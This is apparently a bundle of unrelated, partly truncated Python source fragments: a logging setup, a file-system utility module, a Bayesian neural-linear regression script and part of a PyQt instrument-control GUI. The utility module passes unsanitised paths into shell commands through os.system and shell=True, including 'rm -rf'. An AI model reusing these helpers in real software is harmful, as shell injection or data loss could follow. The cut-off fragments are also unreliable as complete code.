if (logger.hasHandlers()):
logger.handlers.clear()
logger.setLevel(logging.DEBUG)
# create formatter
formatter = logging.Formatter('%(asctime)s - %(message)s')
# create console handler add add to logger
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
ch.setFormatter(formatter)
| |
#!/usr/bin/env python
_MODULE_NAME = "misc"
_MODULE_VERSION = "v0.1.0"
_REVISION_DATE = "2019-01-10"
_AUTHORS = "<NAME> (<EMAIL>) and <NAME> (<EMAIL>)"
_DESCRIPTION = "This is a module for miscellaneous, general purpose functions."
import sys
import os
import struct
import time
import datetime
import subprocess
import hashlib
import mmap
import curses
from numpy import fromstring
###################################################################################################
def banner(SCRIPT_NAME, SCRIPT_VERSION, REVISION_DATE, AUTHORS, CONTRIBUTORS, DESCRIPTION,):
"""
Banner for python scripts.
:param SCRIPT_NAME: The name of the script
:param SCRIPT_VERSION: The version number
:param REVISION_DATE: The latest revision date
:param AUTHORS: The main authors
:param CONTRIBUTORS: Any contributing authors
:param DESCRIPTION: A brief description
:return banner_list: A nicely formatted banner
:rtype: list
"""
banner_list = []
banner_list.append("============================================================================== ")
banner_list.append(SCRIPT_NAME + " " + SCRIPT_VERSION + " (" + REVISION_DATE + ")")
banner_list.append(AUTHORS)
banner_list.append("============================================================================== ")
banner_list.append(time.ctime())
banner_list.append("")
banner_list.append(DESCRIPTION)
if CONTRIBUTORS != '':
banner_list.append("With contributions from:")
banner_list.append(CONTRIBUTORS)
banner_list.append("")
return banner_list
##################################################################################################
def format_invoked_opts(opts,commline_list=[]):
"""
Prints the invoked options to stdout and the logfile.
:param object opts: An object storing the relevant options
:param list commline_list: The entered command line arguments
:return fopts_list: A formatted list of options
:rtype: list
"""
fopts_list = []
if len(commline_list) != 0:
fopts_list.append("Invoked command line: ")
fopts_list.append(" ".join(commline_list))
fopts_list.append("")
fopts_list.append("Invoked options: ")
for key, value in opts.__dict__.items():
fopts_list.append(" " + key + ": " + str(value))
fopts_list.append("")
return fopts_list
##################################################################################################
def wc_dir(dir):
"""
Returns the number of dirs in a given dir via ls -1d | wc -l.
Note that this becomes a rather expensive function call when dir contains many subdirs.
"""
tmp_str = "ls -1d " + dir + "/*/ | wc -l"
# this is a quite new python feature and may is only available in 2.6 or so
# n = subprocess.getoutput(tmp_str)
# ... and for older python versions
return int(subprocess.Popen(tmp_str,shell=True,stdout=subprocess.PIPE).stdout.read())
##################################################################################################
def wc_all(dir):
"""
Returns the number of files and dirs in a given dir via ls -1 | wc -l.
Not that this becomes a rather expensive function call when dir contains many entries.
"""
#TODO: take care of error for empty dirs
tmp_str = "ls -1 " + dir + " | wc -l"
# this is a quite new python feature and may is only available in 2.6 or so
# n = subprocess.getoutput(tmp_str)
# ... and for older python versions
return int(subprocess.Popen(tmp_str,shell=True,stdout=subprocess.PIPE).stdout.read())
##################################################################################################
def line_count(file_namestr):
"""
Returns the number of lines in a file.
"""
if os.path.getsize(file_namestr) == 0:
return 0
with open(file_namestr) as file:
for i, l in enumerate(file):
pass
return i + 1
##################################################################################################
def mksubdir_struct(dir,max_n_entries=10000,run_always=False):
"""
This function takes the content of a dir and makes numbered substructure dirs with each n_entries of the original dir.
The motivation was to have a function with limits the number of entries in a directory to a certain threshold
(e.g., 10,000 or 30,000) in order to avoid performance issues with the OS/filesystem.
:param str dir: Path of the relevant directory
:param int max_n_entries: Max entries in a subdir
:param bool run_always: whether to run even if there are less than :param:'max_n_entries' in :param:'dir'
"""
entry_list = []
for entry in os.listdir(dir):
entry_list.append(entry)
entry_list.sort()
n_entries = len(entry_list)
if n_entries >= max_n_entries or run_always:
subdir_counter = 0
subdir_entry_counter = 0
subdir_pathstr = dir + "/%05d" %(subdir_counter)
if chk_mkdir(subdir_pathstr,True) == False:
sys.exit("Naming conflict!")
for entry in entry_list:
tmp_str = "mv " + entry + " " + subdir_pathstr + "/."
os.system(tmp_str)
subdir_entry_counter +=1
if subdir_entry_counter >= max_n_entries:
subdir_counter += 1
subdir_entry_counter = 0
subdir_pathstr = dir + "/%05d" %(subdir_counter)
if chk_mkdir(subdir_pathstr,True) == False:
sys.exit("Naming conflict!")
##################################################################################################
def chk_mkdir(dir,warning=False):
"""
This function checks whether a directory exists and if not creates it.
"""
if not os.path.isdir(dir):
tmp_str = "mkdir -p " + dir
os.system(tmp_str)
elif warning:
return False
##################################################################################################
def chk_rmdir(dir,check='any'):
"""
This function checks whether a directory exists and removes it, if it is empty.
"""
if os.path.isdir(dir):
n_dirs = 0
n_files = 0
for i in os.listdir(dir):
if os.path.isdir(dir + '/' + i):
n_dirs += 1
elif os.path.isfile(dir + '/' + i):
n_files += 1
if n_dirs == 0 and n_files == 0:
tmp_str = "rm -rf " + dir
elif n_dirs == 0 and check=='dirs':
tmp_str = "rm -rf " + dir
elif n_files == 0 and check=='files':
tmp_str = "rm -rf " + dir
else:
tmp_str = " "
os.system(tmp_str)
##################################################################################################
def chk_rmfile(file_namestr):
"""
This function checks whether a file is empty and if yes deletes it.
"""
file = open(file_namestr,'r')
test_str = file.read()
file.close()
if len(test_str) == 0:
os.remove(file_namestr)
##################################################################################################
def target_dir_struct(target_dir_path, maxitems = 10000, digits=5):
"""
This function checks whether a target dir exists and establishes/checks the subdir structure.
:param str target_dir_path: The path of the directory
:param int maxitems: The max number of items in a directory
:param int digits: The number of digits in the folder names
:return int target_subdir: The number/name of the subdir
:return int target_subdir_n: The number of items in the subdir
:return str target_subdir_pathstr: The path of the subdir
"""
# check if target_dir exists and if not create it
chk_mkdir(target_dir_path)
# establish target_dir structure
# 1) get all the present subdirs
target_subdir_list = [] # fill with all present subfolders
for i in os.listdir(target_dir_path):
if os.path.isdir(target_dir_path + '/' + i) and i not in target_subdir_list:
target_subdir_list.append(i)
# 2a) if there are no subfolders present
if len(target_subdir_list)==0:
target_subdir = 0 # this is the highest folder
target_subdir_n = 0 # this is the number of items in it
# 2b) if there are subfolders present
else:
target_subdir_list.sort()
target_subdir = int(target_subdir_list[-1]) # pick the highest folder
target_subdir_n = wc_all(target_dir_path + '/' + target_subdir_list[-1])
if target_subdir_n >= maxitems: # this limit is more important for folders rather than files (in this case tarballs); but we do it anyways
target_subdir += 1
target_subdir_n = 0
target_subdir_pathstr = target_dir_path + '/' + '{num:{fill}{width}}'.format(num=target_subdir, fill='0', width=digits)
# target_subdir_pathstr = target_dir_path + "/%05d" %(target_subdir)
chk_mkdir(target_subdir_pathstr)
return target_subdir, target_subdir_n, target_subdir_pathstr
##################################################################################################
def mv2subdir_struct(source_dir_pathstr, target_subdir, target_subdir_n, target_subdir_pathstr, maxitems = 10000):
"""
This function moves a source folder into a target subdir structure and updates it.
:param str source_dir_pathstr: The path of the dir to be moved
:param int target_subdir: The number of the target dir
:param int target_subdir_n: The number of items in the target dir
:param str target_subdir_pathstr: The path of the target dir
:param int maxitems: The max number if items in a directory
:return int target_subdir: The number of the subdir
:return int target_subdir_n: The number of items in target subdir
:return str target_subdir_pathstr: The path of the target subdir
"""
# move
tmp_str = 'mv ' + source_dir_pathstr + ' ' + target_subdir_pathstr + '/. '
os.system(tmp_str)
target_subdir_n += 1
# check if limit is reached
if target_subdir_n >= maxitems: # this limit is more important for folders rather than files (in this case tarballs); but we do it anyways
target_subdir += 1
target_subdir_n = 0
# make new target subdir
tmp_str = target_subdir_pathstr.split('/')[-1]
digits = len(tmp_str)
target_subdir_pathstr = target_subdir_pathstr[:-digits] + '{num:{fill}{width}}'.format(num=target_subdir, fill='0', width=digits)
chk_mkdir(target_subdir_pathstr)
return target_subdir, target_subdir_n, target_subdir_pathstr
##################################################################################################
def std_datetime_str(mode='datetime'):
"""
This function gives out the formatted time as a standard string, i.e., YYYY-MM-DD hh:mm:ss.
"""
if mode == 'datetime':
return str(datetime.datetime.now())[:19]
elif mode == 'date':
return str(datetime.datetime.now())[:10]
elif mode == 'time':
return str(datetime.datetime.now())[11:19]
elif mode == 'datetime_ms':
return str(datetime.datetime.now())
elif mode == 'time_ms':
return str(datetime.datetime.now())[11:]
else:
sys.exit("Invalid mode!")
##################################################################################################
def tot_exec_time_str(time_start):
"""
This function gives out the formatted time string.
"""
time_end = time.time()
exec_time = time_end-time_start
tmp_str = "Total execution time: %0.2fs (%dh %dm %0.2fs)" %(exec_time, exec_time/3600, (exec_time%3600)/60,(exec_time%3600)%60)
return tmp_str
##################################################################################################
def intermed_exec_timing(time_start,intermed_n,total_n,n_str="n"):
"""
This function gives out the intermediate timing, speed, pace, projected remaining and end time.
"""
tmp_time = time.time()
tmp_exec_time = tmp_time-time_start
sec_per_n = 1.0*tmp_exec_time/intermed_n
n_per_hour = 3600.0/sec_per_n
proj_rest_sec = sec_per_n*(total_n-intermed_n)
proj_end_time = int(round(tmp_time + proj_rest_sec))
tmp_str = " Current speed: %0.2f " %(n_per_hour)
tmp_str += n_str + "'s/hour; current pace: %0.3f " %(sec_per_n)
tmp_str += "sec/" + n_str + "\n"
# tmp_str +=" | |
<gh_stars>0
# test the effects of being Bayesian only on the last layer
import numpy as np
from numpy import linalg as LA
import torch
from tqdm import tqdm
from tqdm import trange
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.autograd import grad
from torch.autograd import Variable
import pickle
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import os
import cProfile
import scipy
from scipy.stats import multivariate_normal
from sklearn.utils.extmath import cartesian
from copy import deepcopy
import gc
# plot the output of regression network
import torch
from torch.autograd import Variable
import matplotlib.pyplot as plt
import pickle
import os
import numpy as np
def plot_reg(model, model_type, fig_directory, title='', train_x=None, train_y=None):
# get training data
X = data_load[:,0]
Y = data_load[:,1]
X = np.float32(X)
Y = np.float32(Y)
# evaluate model on test points
N = 1000 # number of test points
x_lower = -3 #-1.5
x_upper = 3 #1.5
test_inputs = np.linspace(x_lower, x_upper, N)
# move to GPU if available
test_inputs = torch.FloatTensor(test_inputs)
test_inputs = test_inputs.cuda()
plt.figure()
# sample from the network then plot +/- 1 standard deviation range
no_samp = 100
plt.plot(X, Y, '+k')
if model_type == 'VI':
all_test_outputs = np.zeros((no_samp, N))
for i in range(no_samp):
test_outputs = model(test_inputs, no_samples = 1, shared_weights = True) # make all the datapoints in a batch use the same network weights
# convert back to np array
test_x = test_inputs.data.cpu().numpy()
all_test_outputs[i,:] = test_outputs.data.cpu().numpy()
plt.plot(test_x, all_test_outputs[i,:], linewidth=0.3)
# calculate mean and variance
mean = np.mean(all_test_outputs, 0)
variance = np.mean(all_test_outputs**2, 0) - mean**2
elif model_type == 'NeuralLinear':
mean = np.zeros(N)
variance = np.zeros(N)
for test_point in range(N):
single_mean, single_variance = model.prediction(train_x, train_y, test_inputs[test_point])
mean[test_point], variance[test_point] = single_mean.detach().cpu().numpy(), single_variance.detach().cpu().numpy()
test_x = test_inputs.data.cpu().numpy()
else:
raise ValueError('model_type must be either VI or NeuralLinear')
# variance = model.noise_variance.detach().cpu().numpy() + np.mean(all_test_outputs**2, 0) - mean**2
plt.plot(test_x, mean, color='b')
plt.fill_between(test_x, mean + 2 * np.sqrt(variance),
mean - 2 * np.sqrt(variance), color='b', alpha=0.3)
filename = 'regression_' + title + '.pdf'
filename = os.path.join(fig_directory, filename)
plt.xlabel('$x$')
plt.ylabel('$y$')
plt.ylim([-30, 30])
plt.xlim([-3, 3])
# plt.ylim([-1, 1])
# plt.xlim([-1.5, 1.5])
plt.savefig(filename)
plt.close() # get rid of this if you want to animate
# plot just the variance
plt.figure()
plt.plot(test_x, variance)
plt.xlabel('$x$')
plt.ylabel('predictive variance')
filename = 'variance_' + title + '.pdf'
filename = os.path.join(fig_directory, filename)
plt.savefig(filename)
plt.close()
# pickle for posterity
inputs = test_x
mean = mean
sd = np.sqrt(variance)
pickle_location = os.path.join(fig_directory, title)
outfile = open(pickle_location, 'wb')
pickle.dump(inputs, outfile)
pickle.dump(mean, outfile)
pickle.dump(sd, outfile)
outfile.close()
# if neural linear, plot the correlation and covariance matrices
if model_type == 'NeuralLinear':
posterior_covar = model.posterior_covar.data.cpu().numpy()
fig, ax = plt.subplots()
im = ax.imshow(np.abs(posterior_covar) , interpolation='nearest', cmap=cm.Greys_r)
filepath = os.path.join(fig_directory, 'neural_linear_covariance.pdf')
fig.savefig(filepath)
plt.close()
# plot correlation matrix using cov matrix estimate
variance_vector = np.diag(posterior_covar)
sd_vector = np.sqrt(variance_vector)
outer_prod = np.outer(sd_vector, sd_vector)
correlations = posterior_covar/outer_prod
fig, ax = plt.subplots()
im = ax.imshow(correlations , interpolation='nearest')
fig.colorbar(im)
filepath = os.path.join(fig_directory, 'neural_linear_correlation.pdf')
fig.savefig(filepath)
plt.close()
class MAP_Linear_Layer(nn.Module):
def __init__(self, n_input, n_output, omega):
super(MAP_Linear_Layer, self).__init__()
self.n_input = n_input
self.n_output = n_output
self.omega = omega
# omega is the prior standard deviation (assume isotropic prior)
prior_logvar = 2*np.log(omega)
self.prior_logvar = prior_logvar
"""initialise parameters and priors following 'Neural network ensembles and variational inference revisited', Appendix A"""
# weight parameters
self.W = nn.Parameter(torch.cuda.FloatTensor(n_input, n_output).normal_(0, 1/np.sqrt(4*n_output))) # initialisation of weight means
# bias parameters
self.b = nn.Parameter(torch.cuda.FloatTensor(n_output).normal_(0, 1e-10)) # initialisation of bias means
def forward(self, x, no_samples=None, shared_weights=None): # number of samples per forward pass
"""
input is either (batch_size x no_input), if this is the first layer of the network, or (no_samples x batch_size x no_input),
and output is (no_samples x batch_size x no_output)
"""
batch_size = x.size()[0]
# sample just one weight matrix and just one bias vector
b = self.b.expand(batch_size, -1)
samples_activations = torch.mm(x, self.W) + b
return samples_activations
def KL(self): # get L2 regularisation term
return 0
# return 0.5*(1/(self.omega**2))*(torch.sum(self.W**2) + torch.sum(self.b**2)) # assume prior means are all zero!
class MFVI_Linear_Layer(nn.Module):
def __init__(self, n_input, n_output, omega):
super(MFVI_Linear_Layer, self).__init__()
self.n_input = n_input
self.n_output = n_output
# omega is the prior standard deviation (assume isotropic prior)
prior_logvar = 2*np.log(omega)
self.prior_logvar = prior_logvar
"""initialise parameters and priors following 'Neural network ensembles and variational inference revisited', Appendix A"""
# weight parameters
self.W_mean = nn.Parameter(torch.cuda.FloatTensor(n_input, n_output).normal_(0, 1/np.sqrt(4*n_output))) # initialisation of weight means
self.W_logvar = nn.Parameter(torch.cuda.FloatTensor(n_input, n_output).normal_(-11.5, 1e-10)) # initialisation of weight logvariances
# bias parameters
self.b_mean = nn.Parameter(torch.cuda.FloatTensor(n_output).normal_(0, 1e-10)) # initialisation of bias means
self.b_logvar = nn.Parameter(torch.cuda.FloatTensor(n_output).normal_(-11.5, 1e-10)) # initialisation of bias logvariances (why uniform?)
# prior parameters
self.W_prior_mean = Variable(torch.zeros(n_input, n_output).cuda())
self.W_prior_logvar = Variable((prior_logvar*torch.ones(n_input, n_output)).cuda())
self.b_prior_mean = Variable(torch.zeros(n_output).cuda())
self.b_prior_logvar = Variable((prior_logvar*torch.ones(n_output)).cuda())
self.num_weights = n_input*n_output + n_output # number of weights and biases
def forward(self, x, no_samples, shared_weights=False): # number of samples per forward pass
"""
input is either (batch_size x no_input), if this is the first layer of the network, or (no_samples x batch_size x no_input),
and output is (no_samples x batch_size x no_output)
"""
# local reparameterisation trick
if shared_weights == True: # can't use local reparam trick if we want to sample functions from the network. assume we will only do one test sample at a time
batch_size = x.size()[0]
# sample just one weight matrix and just one bias vector
W_var = torch.exp(self.W_logvar)
b_var = torch.exp(self.b_logvar)
z_W = Variable(torch.cuda.FloatTensor(self.n_input, self.n_output).normal_(0, 1))
z_b = Variable(torch.cuda.FloatTensor(self.n_output).normal_(0, 1))
W = self.W_mean + torch.mul(torch.sqrt(W_var), z_W)
b = self.b_mean + torch.mul(torch.sqrt(b_var), z_b)
b = b.expand(batch_size, -1)
samples_activations = torch.mm(x, W) + b
else:
# find out if this is the first layer of the network. if it is, perform an expansion to no_samples
if len(x.shape) == 2:
batch_size = x.size()[0]
z = self.get_random(no_samples, batch_size)
gamma = torch.mm(x, self.W_mean) + self.b_mean.expand(batch_size, -1)
W_var = torch.exp(self.W_logvar)
b_var = torch.exp(self.b_logvar)
delta = torch.mm(x**2, W_var) + b_var.expand(batch_size, -1)
sqrt_delta = torch.sqrt(delta)
samples_gamma = gamma.expand(no_samples, -1, -1)
samples_sqrt_delta = sqrt_delta.expand(no_samples, -1, -1)
samples_activations = samples_gamma + torch.mul(samples_sqrt_delta, z)
elif len(x.shape) == 3:
batch_size = x.size()[1]
z = self.get_random(no_samples, batch_size)
# samples_gamma has different values for each sample, so has dimensions (no_samples x batch_size x no_outputs)
samples_gamma = torch.matmul(x, self.W_mean) + self.b_mean.expand(no_samples, batch_size, -1)
W_var = torch.exp(self.W_logvar)
b_var = torch.exp(self.b_logvar)
# delta has different values for each sample, so has dimensions (no_samples x batch_size x no_outputs)
delta = torch.matmul(x**2, W_var) + b_var.expand(no_samples, batch_size, -1)
samples_sqrt_delta = torch.sqrt(delta)
samples_activations = samples_gamma + torch.mul(samples_sqrt_delta, z)
return samples_activations
def get_random(self, no_samples, batch_size):
return Variable(torch.cuda.FloatTensor(no_samples, batch_size, self.n_output).normal_(0, 1)) # standard normal noise matrix
def KL(self): # get KL between q and prior for this layer
# W_KL = 0.5*(- self.W_logvar + torch.exp(self.W_logvar) + (self.W_mean)**2)
# b_KL = 0.5*(- self.b_logvar + torch.exp(self.b_logvar) + (self.b_mean)**2)
W_KL = 0.5*(self.W_prior_logvar - self.W_logvar + (torch.exp(self.W_logvar) + (self.W_mean - self.W_prior_mean)**2)/torch.exp(self.W_prior_logvar))
b_KL = 0.5*(self.b_prior_logvar - self.b_logvar + (torch.exp(self.b_logvar) + (self.b_mean - self.b_prior_mean)**2)/torch.exp(self.b_prior_logvar))
return W_KL.sum() + b_KL.sum() - 0.5*self.num_weights
class Neural_Linear_Net(nn.Module):
def __init__(self, noise_variance, hidden_sizes, omega, activation, learned_noise_var=False, input_dim=None, noise_param_init=None):
super(Neural_Linear_Net, self).__init__()
self.omega = float(omega)
self.dim_input = input_dim
self.activation = activation
self.learned_noise_var = learned_noise_var
if self.learned_noise_var:
self.noise_var_param = nn.Parameter(torch.cuda.FloatTensor([noise_param_init]))
self.noise_variance = self.get_noise_var()
else:
self.noise_variance = torch.cuda.FloatTensor([float(noise_variance)])
# create the layers in the network based on params
self.hidden_sizes = hidden_sizes
self.linears = nn.ModuleList([MAP_Linear_Layer(self.dim_input, self.hidden_sizes[0], self.omega)])
self.linears.extend([MAP_Linear_Layer(self.hidden_sizes[i], self.hidden_sizes[i+1], self.omega) for i in range(0, len(self.hidden_sizes)-1)])
self.linears.append(MAP_Linear_Layer(self.hidden_sizes[-1], 1, self.omega))
def get_noise_var(self):
if self.learned_noise_var:
return torch.exp(self.noise_var_param) # try just a log representation
else:
return self.noise_variance
def get_KL_term(self):
# calculate KL divergence between q and the prior for the entire network
KL_term = 0
for _, l in enumerate(self.linears):
KL_term = KL_term + l.KL()
return KL_term
def get_U(self, inputs, labels, trainset_size):
# calculate L2 regularised loss
self.noise_variance = self.get_noise_var()
outputs = self.forward(inputs)
no_samples = outputs.size()[0]
labels = labels.expand(no_samples, -1)
const_term = 0.5*torch.log(2*3.141592654*self.get_noise_var())
reconstruction_loss = (trainset_size)*(const_term + (1/(2*self.get_noise_var()))*torch.mean((labels - outputs)**2))
# KL_term = self.get_KL_term()
# U = (reconstruction_loss + KL_term)/trainset_size # per-datapoint ELBO
U = reconstruction_loss # try MAXIMUM LIKELIHOOD
return U
def forward(self, s, shared_weights=False):
for i, l in enumerate(self.linears):
s = l(s)
if i < len(self.linears) - 1:
s = self.activation(s)
# | |
title = "Image not parsed!", host = self)
# Check if options changed
if self._DP_optionsChangedFlag:
ret = self.unsavedQuestionDialog(message = "Reparse with changed options?", title = "Options Changed",informativeText = "The parsing options have been changed since the last parse.\n\nSave to reparse with new options\nDiscard/Cancel to go back", host = self)
if ret == QtWidgets.QMessageBox.Save:
self._DP_parsePicture()
else:
return
# Check if enough space
if not estimateOnly:
size = self.picConv.image.size # (width, height)
fx = self.stageControl.controller.stage.x + self.picConv.scale["x"] * size[0]
fy = self.stageControl.controller.stage.y + self.picConv.scale["y"] * size[1]
xlim = sorted(self.stageControl.controller.stage.xlim)
ylim = sorted(self.stageControl.controller.stage.ylim)
xcond = xlim[0] <= fx <= xlim[1]
ycond = ylim[0] <= fy <= ylim[1]
if not xcond and not ycond:
return self.criticalDialog(message = "Image too large!", informativeText = "At the current position, printing the picture will exceed stage limits in both the x and y direction\n\nStage Limits = x[{}, {}], y[{}, {}]\nImage Size = ({}, {})\nCurrent Stage Position = ({}, {})".format(*xlim, *ylim, *size, *self.stageControl.controller.stage.position), title = "Image too large!", host = self)
elif not xcond:
return self.criticalDialog(message = "Image too large!", informativeText = "At the current position, printing the picture will exceed stage limits in the x direction\n\nStage Limits = x[{}, {}]\nImage Size = ({}, {})\nCurrent Stage Position = ({}, {})".format(*xlim, *size, *self.stageControl.controller.stage.position), title = "Image too large!", host = self)
elif not ycond:
return self.criticalDialog(message = "Image too large!", informativeText = "At the current position, printing the picture will exceed stage limits in the y direction\n\nStage Limits = y[{}, {}]\nImage Size = ({}, {})\nCurrent Stage Position = ({}, {})".format(*ylim, *size, *self.stageControl.controller.stage.position), title = "Image too large!", host = self)
# / Check space
# Check the velocity
vel = self._DP_velocity.text()
try:
vel = float(vel)
except Exception as e:
return self.criticalDialog(message = "Input Error", informativeText = "Unable to parse velocity into float. (Got {})".format(vel), title = "Input Error", host = self)
if not estimateOnly:
# alert confirm user has moved to (0,0)
# We don't bother if the user changed the filename without loading, we just let them know what image will be drawn.
ret = self.unsavedQuestionDialog(message = "Start drawing?", title = "Draw Picture",informativeText = "Using {}\n\nThis point has been taken as the (0, 0) of the image. This usually the top left.\n\nDraw to proceed.\nCancel to go back and change stage position.".format(self._DP_filename_string), host = self, buttons = {
QtWidgets.QMessageBox.Save : "Draw"
}, noDiscard = True)
if ret != QtWidgets.QMessageBox.Save:
return
# Here we start to draw
self.setStartButtonsEnabled(False)
self._DP_picture_draw.setStyleSheet("")
self.setOperationStatus("Starting Draw Picture...")
q = ThreadWithExc(target = self._picConv_draw, args=(vel,))
q.start()
else:
td = datetime.timedelta(seconds = self.picConv.estimateTime(velocity = vel))
return self.informationDialog(message = "The picture will take approximately {}.".format(td), title = "Estimated Time", host = self)
def _picConv_draw(self, velocity):
try:
# Errors are supposed to be emitted directly
self.stageControl.controller.shutter.quietLog = True
self.picConv.draw(velocity = velocity)
self.stageControl.controller.shutter.quietLog = False
self.stageControl.finishTone()
except Exception as e:
self.setOperationStatus("Error Occurred. {}".format(e))
if self.devMode:
raise
else:
# If no error
self.setOperationStatus("Ready.")
finally:
# Always run
self.setStartButtonsEnabled(True)
PDIALOG_TIMEOUT = 1 # in seconds
def pDialog_setValue(self, val):
# print("SETTING VALUE: ", val)
if val == 100 or val == 50 or val == 0 or datetime.datetime.now() > self.lastPDialogUpdate + datetime.timedelta(seconds = self.PDIALOG_TIMEOUT):
self.lastPDialogUpdate = datetime.datetime.now()
self.pDialog.setValue(val)
elif val == 100:
time.sleep(PDIALOG_TIMEOUT)
self.pDialog_setValue(val)
def pDialog_setLabelText(self, text):
if datetime.datetime.now() > self.lastPDialogUpdate + datetime.timedelta(seconds = self.PDIALOG_TIMEOUT):
self.lastPDialogUpdate = datetime.datetime.now()
self.pDialog.setLabelText(text)
# Helper functions
def setOperationStatus(self, status, printToTerm = True, **printArgs):
self.currentStatus = status
if printToTerm:
print("[{}]".format(datetime.datetime.now().time()), status, **printArgs)
# Do some updating of the status bar
self._statusbar_label.setText(status)
def logconsole(self, status):
print("[{}]".format(datetime.datetime.now().time()), status)
EL_self_criticalDialog = QtCore.pyqtSignal('QString', 'QString', 'QString', 'bool')
def on_EL_self_criticalDialog(self, message, title = "Oh no!", informativeText = None, exitAfter = False):
ret = self.criticalDialog(message = message, title = title, informativeText = informativeText, host = self)
if exitAfter:
return os._exit(1) # For the exit to propagate upwards
else:
return ret
def criticalDialog(self, message, title = "Oh no!", informativeText = None, host = None):
_msgBox = QtWidgets.QMessageBox(host)
_msgBox.setIcon(QtWidgets.QMessageBox.Critical)
_msgBox.setWindowTitle(title)
_msgBox.setText(message)
if informativeText is not None:
_msgBox.setInformativeText(informativeText)
# Get height and width
_h = _msgBox.height()
_w = _msgBox.width()
_msgBox.setGeometry(0, 0, _w, _h)
moveToCentre(_msgBox)
# mb.setTextFormat(Qt.RichText)
# mb.setDetailedText(message)
_msgBox.setTextInteractionFlags(QtCore.Qt.TextSelectableByMouse)
self.winAudioSetMuted(True)
ret = _msgBox.exec_()
self.winAudioSetMuted(False)
return ret
def informationDialog(self, message, title = "Information", informativeText = None, host = None):
_msgBox = QtWidgets.QMessageBox(host)
_msgBox.setIcon(QtWidgets.QMessageBox.Information)
_msgBox.setWindowTitle(title)
_msgBox.setText(message)
if informativeText is not None:
_msgBox.setInformativeText(informativeText)
# Get height and width
_h = _msgBox.height()
_w = _msgBox.width()
_msgBox.setGeometry(0, 0, _w, _h)
moveToCentre(_msgBox)
# mb.setTextFormat(Qt.RichText)
# mb.setDetailedText(message)
# _msgBox.setTextInteractionFlags(QtCore.Qt.TextSelectableByMouse)
self.winAudioSetMuted(True)
ret = _msgBox.exec_()
self.winAudioSetMuted(False)
return ret
def unsavedQuestionDialog(self, message, title = "Unsaved", informativeText = None, host = None, buttons = {}, noDiscard = False):
_msgBox = QtWidgets.QMessageBox(host)
_msgBox.setIcon(QtWidgets.QMessageBox.Question)
_msgBox.setWindowTitle(title)
_msgBox.setText(message)
if informativeText is not None:
_msgBox.setInformativeText(informativeText)
if not noDiscard:
_msgBox.setStandardButtons(QtWidgets.QMessageBox.Save | QtWidgets.QMessageBox.Discard | QtWidgets.QMessageBox.Cancel)
else:
_msgBox.setStandardButtons(QtWidgets.QMessageBox.Save | QtWidgets.QMessageBox.Cancel)
_msgBox.setDefaultButton(QtWidgets.QMessageBox.Cancel)
if buttons and isinstance(buttons, dict):
for key, val in buttons.items():
_msgBox.button(key).setText(val)
# Get height and width
_h = _msgBox.height()
_w = _msgBox.width()
_msgBox.setGeometry(0, 0, _w, _h)
moveToCentre(_msgBox)
# mb.setTextFormat(Qt.RichText)
# mb.setDetailedText(message)
# _msgBox.setTextInteractionFlags(QtCore.Qt.TextSelectableByMouse)
self.winAudioSetMuted(True)
ret = _msgBox.exec_()
self.winAudioSetMuted(False)
return ret
# https://doc.qt.io/qt-5/qprogressdialog.html
def progressDialog(self, host = None, title = "Progress", labelText = None, cancelButtonText = "Cancel", range = (0, 100)):
# QProgressDialog::QProgressDialog(const QString &labelText, const QString &cancelButtonText, int minimum, int maximum, QWidget *parent = nullptr, Qt::WindowFlags f = Qt::WindowFlags())
# NOTE: DOES NOT EXEC
pDialog = QtWidgets.QProgressDialog(labelText, cancelButtonText, range[0], range[1], host)
pDialog.setWindowFlags(QtCore.Qt.WindowTitleHint | QtCore.Qt.Dialog | QtCore.Qt.WindowMaximizeButtonHint | QtCore.Qt.CustomizeWindowHint)
pDialog.setWindowTitle(title)
pDialog.setWindowModality(QtCore.Qt.WindowModal)
# Get height and width
_h = pDialog.height()
_w = pDialog.width()
pDialog.setGeometry(0, 0, _w, _h)
moveToCentre(pDialog)
self.lastPDialogUpdate = datetime.datetime.now()
return pDialog
operationDone = QtCore.pyqtSignal()
def on_operationDone(self):
self.informationDialog(message = "Operation Completed!", title = "Done!", host = self)
if self.stageControl.musicProcess and self.stageControl.musicProcess.isAlive():
try:
self.stageControl.musicProcess.terminate()
except Exception as e:
self.logconsole("{}: {}".format(type(e).__name__, e))
picConvWarn = QtCore.pyqtSignal('QString', 'QString')
# [str, str]
def on_picConvWarn(self, message, error):
return self.criticalDialog(message = message, title = "PicConv Error!", informativeText = error, host = self)
# Status Bar
class aboutPopUp(QtWidgets.QDialog):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.initUI()
def initUI(self):
# x, y, w, h
self.setGeometry(0, 0, 250, 200)
self.setAttribute(QtCore.Qt.WA_DeleteOnClose) # WidgetAttribute.
self.setWindowTitle("About")
moveToCentre(self)
self._main_layout = QtWidgets.QVBoxLayout()
# setContentsMargins(left, top, right, bottom)
self._main_layout.setContentsMargins(10, 10, 10, 10)
one = QtWidgets.QLabel("Made by")
one.setAlignment(QtCore.Qt.AlignCenter)
two = QtWidgets.QLabel("<NAME>, <NAME>\n2019")
two.setAlignment(QtCore.Qt.AlignCenter)
ema = QtWidgets.QLabel()
dianyous = [
["sunyudong", "outlook.sg"],
["mingsongwu", "outlook.sg"]
]
ema.setText("<a href=\"mailto:{}\" title=\"Please don't spam us thanks\">sunyudong [at] outlook [dot] sg</a><br/><a href=\"mailto:{}\" title=\"Please don't spam us thanks\">mingsongwu [at] outlook [dot] sg</a>".format(*map("@".join, dianyous)))
ema.setTextFormat(QtCore.Qt.RichText)
ema.setTextInteractionFlags(QtCore.Qt.TextBrowserInteraction)
ema.setOpenExternalLinks(True)
ema.setAlignment(QtCore.Qt.AlignCenter)
thr = QtWidgets.QLabel("NUS Nanomaterials Lab")
thr.setAlignment(QtCore.Qt.AlignCenter)
self._main_layout.addWidget(one)
self._main_layout.addWidget(two)
self._main_layout.addWidget(ema)
self._main_layout.addWidget(thr)
self.setLayout(self._main_layout)
class SettingsScreen(QtWidgets.QDialog):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.microGUIParent = self.parentWidget()
self.initUI()
def initUI(self):
self.setWindowTitle("Settings")
# x, y ,w, h
self.setGeometry(0, 0, 500, 300)
self.setAttribute(QtCore.Qt.WA_DeleteOnClose)
moveToCentre(self)
self.makeUI()
self.loadSettings()
self.initEventListeners()
def makeUI(self):
self._main_layout = QtWidgets.QGridLayout()
